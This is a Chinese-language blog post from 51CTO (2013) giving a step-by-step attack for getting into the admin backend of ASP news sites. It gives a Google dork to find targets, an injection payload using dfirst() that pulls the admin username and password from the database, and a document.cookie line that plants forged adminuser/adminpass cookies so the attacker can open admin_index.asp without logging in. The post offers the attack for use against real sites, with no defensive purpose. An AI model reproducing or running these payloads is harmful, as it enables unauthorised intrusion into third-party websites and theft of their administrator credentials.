COOKIES欺骗通杀漏洞进后台

原创

许肖 2013-07-16 10:53:45 ©著作权

文章标签 cookies 文章分类 网络安全

©著作权归作者所有：来自51CTO博客作者许肖的原创作品，请联系作者获取转载授权，否则将追究法律责任

在谷歌里搜索：inurl:news_more.asp?lm2=

搜索到如下站点：http://www.*********/news_more.asp?lm2=169

1.将“/news_more.asp?lm2=169”替换成“/admin/admin_news_pl_view.asp?id=1”

2.将 |'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username=' 粘贴到如下框内，修改保存。

将 alert(document.cookie="adminuser=" + escape("1"));alert(document.cookie="adminpass=" + escape("2")); 代码拷贝进浏览器，回车；（注：标红1处填上图中1内容，2处填上图中2内容）

COOKIES欺骗通杀漏洞进后台_cookies_02 点击确定。

COOKIES欺骗通杀漏洞进后台_cookies_03 点击确定。

5.将地址 http://www.*********/admin/admin_news_pl_view.asp?id=1 改成 http://www.*********/admin/admin_index.asp 回车，即可不用登录直接进入后台了。如图，

COOKIES欺骗通杀漏洞进后台_cookies_04

提问和评论都可以，用心的回复会被更多人看到评论

发布评论

相关文章

官方博客	全部文章	热门标签	班级博客
了解我们	网站地图	意见反馈

鸿蒙开发者社区	51CTO学堂
51CTO	软考资讯